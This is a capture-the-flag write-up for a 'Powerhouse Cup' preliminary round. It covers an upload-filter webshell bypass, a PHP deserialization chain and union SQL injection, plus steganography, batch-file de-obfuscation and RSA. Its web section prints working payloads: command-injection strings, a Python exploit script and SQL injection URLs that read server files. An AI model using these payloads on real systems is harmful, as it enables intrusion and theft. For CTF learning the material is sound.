Powerhouse Cup Preliminary WP
2022-07-30 06:34:00 【Msaerati】
WEB
upload_new
After a series of tests: only .jpg files can be uploaded and the content is also checked for `<?`, but a small shell (小马) can still be constructed.

The upload error page is Apache's, which suggests using .htaccess to get the PHP webshell executed.

用bp来修改类型

Change the image type again

用蚁剑连接

得到flag

POP
代码审计
<?php
// Keyword filter: replaces a few dangerous function names (and the word "flag") with "nonono",
// case-insensitively.  Note that the replacement length differs from the matched word
// (e.g. 'fopen' is 5 bytes, 'nonono' is 6), so the output can be longer than the input —
// which matters when the filtered text is a serialized string with declared lengths.
function filter($string) {
    $blocked = array('system', 'fopen', 'fread', 'file_get_contents', 'flag');
    $pattern = '/' . implode('|', $blocked) . '/i';
    return preg_replace($pattern, 'nonono', $string);
}
class PingUtils{
    // Magic method: any call to an undefined method on a PingUtils lands here.
    // The first argument is interpolated unescaped into a shell command, so this is a
    // command-injection sink (the page notes a value such as `127.0.0.1 || cat /flag`
    // runs a second command). Outside a CTF, escapeshellarg() would be required here.
    function __call($name, $args){
        $target = $args[0];
        system("ping -c4 $target");
    }
}
class Cindy{
    // Both fields are reachable by the attacker in this challenge: someone is copied
    // straight from the request in Bob::__get (the page notes it can be set to 127.0.0.1),
    // phone is the object whose call() is invoked.
    public $someone;
    public $phone;
    // Delegates to whatever object is stored in phone; with a PingUtils there the call
    // ends up in its __call.
    function call(){
        $who = $this->someone;
        $this->phone->call($who);
    }
}
class Bob{ // page note: flag must stay True in this class
    public $flag=True;
    // Invoked when an undefined property of a Bob is read (Alice::__destruct reads ->b,
    // so an Alice whose c is a Bob ends up here).
    public function __get($a){
        if($this->flag){
            $cindy = new Cindy();
            $cindy->someone = $_REQUEST['someone'];
            // phone is fixed here, so it cannot be set directly; the only request-controlled
            // field that goes through the round trip below is someone.
            $cindy->phone = "p50";
            #var_dump(filter(serialize($cindy)));
            // Deserialization sink: filter() rewrites an already-serialized string, and its
            // replacement changes the byte length, so the declared string lengths no longer
            // match the data. This is the bug the page's payload relies on.
            $cindy = unserialize(filter(serialize($cindy)));
            // $someone is undefined in this scope; Cindy::call() takes no arguments anyway.
            $cindy->call($someone);
        }else{
            echo 'nonono';
        }
    }
    // Runs on unserialize() and clears flag, which would block __get. The page's payload
    // is crafted so that this does not take effect (flag has to remain True).
    public function __wakeup(){
        $this->flag = False;
    }
}
class Alice{
    // Destructor reads ->b on whatever object is stored in ->c. If that object has no b
    // property, the read triggers its __get — which is how the chain on this page starts.
    public function __destruct(){
        $holder = $this->c;
        echo $holder->b;
    }
}
highlight_file(__FILE__);
@unserialize($_GET['pop']);http://127.0.0.1/2.php?pop=O:5:%22Alice%22:1:{s:1:%22c%22;O:3:%22Bob%22:2:{s:4:%22flag%22;b:1;}}&someone=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagfopen|ls%22;s:5:%22phone%22;O:9:%22PingUtils%22:0:{}} ls /看到flag flag名字用f???绕过 最后payload
http://127.0.0.1/2.php?pop=O:5:%22Alice%22:1:{s:1:%22c%22;O:3:%22Bob%22:2:{s:4:%22flag%22;b:1;}}&someone=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagfopen|ls%22;s:5:%22phone%22;O:9:%22PingUtils%22:0:{}} ls /<?php
// Keyword filter: replaces a few dangerous function names (and the word "flag") with
// "nonono", case-insensitively. The replacement length differs from the matched word,
// so the output length is not the input length.
function filter($string) {
    $blocked = array('system', 'fopen', 'fread', 'file_get_contents', 'flag');
    $pattern = '/' . implode('|', $blocked) . '/i';
    return preg_replace($pattern, 'nonono', $string);
}
class Cindy{
    // Plain data holder used by the local test script: someone is the value passed on,
    // phone is the object whose call() receives it.
    public $someone;
    public $phone;
    // Forwards someone to phone->call(); with a PingUtils in phone this hits __call.
    function call(){
        $who = $this->someone;
        $this->phone->call($who);
    }
}
class PingUtils{
    // Magic method: any undefined method call lands here. The first argument is placed
    // unescaped into a shell command — a command-injection sink (escapeshellarg() would be
    // the fix outside a CTF).
    function __call($name, $args){
        $target = $args[0];
        system("ping -c4 $target");
    }
}
$a = new Cindy();
$b = new PingUtils();
$a -> someone = '127.0.0.1;cat /flag';
官方exp
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
import requests as r
# Input is the target machine IP and port and what to verify flag
# Positional CLI arguments: target host, target port, and the flag to verify against.
HOST, PORT, FLAG = sys.argv[1], sys.argv[2], sys.argv[3]
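def exp(ip, port):
    """Trigger the challenge's deserialization chain and read the flag from the response.

    Args:
        ip: target host.
        port: target port.

    Returns:
        The text inside the first ``flag{...}`` found in the response body.

    Raises:
        ValueError: if the response contains no ``flag{...}`` marker (the original
            raised a bare IndexError here).
        requests.RequestException: propagated from the HTTP call.
    """
    url = f"http://{ip}:{port}"
    # Serialized Alice whose ->c is a Bob: Alice::__destruct reads ->b, which Bob does not
    # define, so Bob::__get runs. Taken verbatim from the official exploit (the trailing
    # `;N;` is part of that payload).
    pop = 'O:5:"Alice":1:{s:1:"c";O:3:"Bob":0:{};N;}'
    # Tail that the server's unserialize(filter(serialize(...))) parses as an extra
    # `phone` property holding a PingUtils.
    payload = '";s:5:"phone";O:9:"PingUtils":0:{}}'
    # filter() turns each 5-byte 'fopen' into the 6-byte 'nonono', so the serialized
    # `someone` string grows by exactly len(payload) bytes past its declared length and the
    # tail is parsed as separate data. Raw string: `\l` must stay a literal backslash.
    someone = r'127.0.0.1;cat /f\lag;#' + 'fopen' * len(payload) + payload
    # timeout so a hung target does not block the checker forever
    res = r.post(f"{url}/?pop={pop}", data={"someone": someone}, timeout=10)
    match_group = re.findall("flag{(.*?)}", res.text)
    if not match_group:
        raise ValueError("no flag{...} marker found in the response")
    return match_group[0]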
# 主逻辑
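if __name__ == '__main__':
    flag = exp(HOST, PORT)
    print(flag)
    # Compare the retrieved flag with the expected one. An explicit check replaces the
    # original `assert` (stripped under `python -O`) and still exits non-zero on mismatch.
    if flag != FLAG:
        raise SystemExit(f"Fail: got {flag!r}, expected {FLAG!r}")
    print("Pass!")
    # The original also did `print(res.text)` here, but `res` is local to exp() and that
    # line could only raise NameError, so it is dropped.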
SQL
双写绕过
获取路径
1.
payload: http://27.0.166.76:39782/index.php?id=-1' or 1=2 union selselectect1,fllllag,3 from fl4g-- -
读取文件
1. 读取 /var/www/html/flag.php
2.
payload: http://27.0.166.76:39782/index.php?id=-1' or 1=2 union selselectect1,load_file("/var/www/html/flag.php"),3 -- -
3. 右键查看源代码，获取flag

MISC
Welcome_to_QGB
直接base64

包上 flag{} 即可：flag{Welcome_to_QGB}
大佬大佬
The challenge file is a png image; run zsteg on it first.

Another png is found inside; extract it.

The challenge hints at changing the size, so modify the image's height.

得到flag

The fun picture
The challenge is an encrypted archive; brute-force the password directly.

密码为6yOK,解压后得到三个文件

查看flag.txt

The hint says the flag is an image. Opening it in 010 Editor shows the file header is missing, so add the %png header.

This gives a QR code; scanning it yields a base64 string.

解密得到flag

找找GIF
The challenge has three files. Opened with WinRAR, aaa asks for a password, but with 360 Zip the password is gone (not sure why).

aaa has no extension, so open it in 010 Editor.

It is a png; rename it with a .png extension and view it — it looks like about half of the image is missing.

修改高度


Turned around, it reads as the password for bbb.zip; extracting that gives a file bbb with no extension. In 010 Editor it has no file header, but it ends with 00 3b.

Presumably a gif file; add the gif file header.

This gives a gif in which the flag flashes by; take a screenshot to get the flag.

[email protected]
What a weird file! We intercepted it from a hacker's computer — can you help analyze it? (Note: the FLAG is in uuid format; it is normal for the machine to restart while debugging, so watch the challenge's output.)
An encrypted bat file. Searching for "bat 乱码 解密" turns up a method that decrypts it by opening it as a doc.

Then continue to search for features 找到这篇文章
还原BatchEncryption(201610版本)Obfuscated batch file
还原BatchEncryption(201610版本)Obfuscated batch file_AEmmett's blog-CSDN博客_batchencryption解密
Use the script provided there, slightly modified: delete the check for
`::BatchEncryption Build 201610 By [email protected]\r\n` (the source file fails that check and reports an error), then decrypt the source file directly.
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Batch Decryption 202009 (BatchEncryption Build 201610)
#
import os
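def decryption(data):
    """Decrypt a BatchEncryption (Build 201610) obfuscated batch file.

    Args:
        data: the raw file bytes. The header must start with the byte-order
            mark FF FE followed by the literal ``' &cls\\r\\n'``; decoding then
            starts at byte offset 60 (the header length assumed by the original
            script for this build — not verified here).

    Each line is handed to run(), which prints the de-obfuscated text and
    records any ``set name=value`` definitions in a variable table that later
    ``%var:~x,y%`` references are expanded from.

    Returns:
        None. On a malformed header an error is printed and nothing is decoded
        (same behaviour as the original, which also just printed and returned).
    """
    # Length guard first: the original indexed data[0]/data[1] and crashed on short input.
    if len(data) < 9 or data[0] != 0xFF or data[1] != 0xFE:
        print('Batch decryption bom error!')
        return
    # Compare bytes directly; decoding arbitrary input as UTF-8 could raise instead of
    # reporting the error.
    if data[2:9] != b' &cls\r\n':
        print('Batch decryption cls error!')
        return
    env = {}  # variable table: name -> value, filled by `set` lines in run()
    offset = 60
    total = len(data)
    while offset < total:
        offset = run(env, data, offset)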
def run(vars, data, i):
    """Decode one obfuscated line that starts at byte offset i.

    Scans data from i up to the next CR LF, copying ordinary bytes into buf
    and expanding %...% references through var_percent(). When the line ends
    the decoded text is printed, and any `set name=value` segments (separated
    by '&@') are stored in vars for later expansion.

    Args:
        vars: variable table (name -> value) shared across lines; mutated here.
        data: the whole file as bytes.
        i: offset of the first byte of this line.

    Returns:
        The offset just past the line's CR LF, or len(data) if the data ran out.
    """
    buf = ''
    f = 0          # offset of the opening '%' of the reference being collected
    t = 0          # offset of its closing '%'
    x = False      # True while inside a %...% reference
    l = len(data)
    while(True):
        # CR LF terminates the line.
        # NOTE(review): data[i+1] is read with no bounds check — a file whose last line
        # does not end in CR LF raises IndexError here.
        if data[i] == 0x0d and data[i+1] == 0x0a:
            i += 2
            break
        # '%' either opens a reference or closes the current one: get %var:~x,y% %0
        if data[i] == 0x25:
            if not x:
                x = True
                f = i
            else:
                x = False
                t = i
                rst = var_percent(data[f:t+1], vars)
                buf += rst
        else:
            if not x:
                # plain byte outside a reference, appended one byte at a time
                buf += str(data[i:i+1], encoding="utf-8")
            else:
                # '%' immediately followed by a digit or '*' is a batch argument
                # (%0..%9, %*): emitted literally instead of being looked up
                if (f + 1 == i) and ((data[i] >= 0x30 and data[i] <= 0x39) or data[i] == 0x2a):
                    x = False
                    t = i
                    rst = str(data[f:t+1], encoding="utf-8")
                    buf += rst
        i += 1
        if i >= l:
            break
    # The decoded line is the script's output.
    print(buf)
    # Record variable definitions for later %var% expansion. '^^^' is presumably the
    # obfuscator's escaped caret — TODO confirm against the obfuscator's output.
    bufs = buf.split('&@')
    for var in bufs:
        if var[0:4] == 'set ':
            var = var[4:]
            b = var.find('=')
            vars[var[0:b]] = var[b+1:].replace('^^^', '^')
    return i
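def var_percent(data, vars):
    """Expand one ``%var%`` / ``%var:~start,length%`` reference (cmd.exe substring syntax).

    Args:
        data: the bytes of the reference including both '%' delimiters.
        vars: variable table; a name missing from it is looked up with
            os.getenv() and cached in the table (even for a plain ``%var%``,
            as in the original).

    Returns:
        The expanded text. A plain ``%var%`` with no ``:~`` part is returned
        unchanged, as in the original. For the substring form a negative start
        counts from the end; a missing length means "to the end" and a negative
        length drops that many characters from the end (cmd.exe semantics —
        the original only handled ``start,length`` with a non-negative length
        and crashed on an undefined variable).
    """
    full = str(data, encoding="utf-8")
    name, sep, spec = full[1:-1].partition(':~')
    if name not in vars:
        vars[name] = os.getenv(name)
    if not sep:
        return full
    # An undefined variable expands to nothing rather than failing on len(None).
    value = vars[name] or ''
    length = len(value)
    start_s, _, len_s = spec.partition(',')
    start = int(start_s)
    if start < 0:
        # same arithmetic as the original (no clamping at 0)
        start = length + start
    if not len_s:
        end = length
    else:
        count = int(len_s)
        end = start + count if count >= 0 else length + count
    return value[start:end]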
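encrypt_file = './[email protected]'  # path of the obfuscated batch file (name as shown on the page)

if __name__ == '__main__':
    # Read the whole file as bytes; the decoder works on raw byte offsets.
    try:
        with open(encrypt_file, "rb") as fh:
            data = fh.read()
    except OSError as err:
        # The original used a bare `exit` here, which does nothing; fail explicitly.
        print('Batch decryption read error:', err)
        raise SystemExit(1)
    decryption(data)
    # Running this prints the de-obfuscated lines; the flag appears in that output.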

flag{156b404a-6bc8-4bf7-8121-a133795e4edd}
Crypto
babyRSA
基本的rsa公式
import gmpy2 as gp
import binascii
p = 122661900225958537473593999629721155547445152508344628379156151659796333424765145214036218314036538367449542188442412001233407797975924025535192193558685614179856037200129145911423039793961531441773477698026833665056111228506730246279582720435235709543855376031268946650792983451355568301885456994665262875749
q = 152724789318100477389853045726902882371493936383383619555088124064539207319241990180547432685312774553372809313491471789726609450644068056661970298474939384495232219405764685450242448624149384201199927977364779992607712253080589100019883370160068766123718298014862011278111513825917110130106578782458953059859
e = 33
c = 11852026632281701016724299626853609925180998208455660311000462227020929333377781887963495074427303581997467868526563174560178272022772274396432682692794063165224973938499915472777760940556428251371134510052503881386517887007288504116932135535735038891342756359104150065602002052735935730495500714873277911540993054971564663909394753577934282562474400064427000243598933915050367444422905464938144621404295662232927161154426321727883942392656517143955794390377418120483810457172329736269488772672472120992463072392783584779323287481047740952196227038157414187174528649660615317679662848063671637919176651288177629770199
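def rsa_decrypt(p, q, e, c):
    """Textbook RSA decryption from the two primes and the public exponent.

    Args:
        p, q: the prime factors of the modulus.
        e: public exponent.
        c: ciphertext as an integer.

    Returns:
        The plaintext integer m = c^d mod n, with d the inverse of e modulo phi(n).
    """
    n = p * q
    phi = (p - 1) * (q - 1)
    # Modular inverse via the builtin (Python 3.8+); replaces gp.invert so the
    # gmpy2 import above is no longer required.
    d = pow(e, -1, phi)
    return pow(c, d, n)


if __name__ == '__main__':
    m = rsa_decrypt(p, q, e, c)
    # Prints m; the page shows that value next, converts it to hex and decodes the flag.
    print(m)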
621705382104866156546935593390435525320795645461697933164154189039655097974493239721747686929741415975229964611798557062065834464781726955133063049051993398215120634674474750860776295024520795799504015222397
将他转16进制
7beee48d0f44b72d5339c5117463133814bb5ba5ad2fdb13a2da3eaeab17a20408575542981c267a5f165c32df842d1f666c61677b32363061396137333833616664356663393739333566326332643464366662667d
再将这段 hex 解码得到 flag
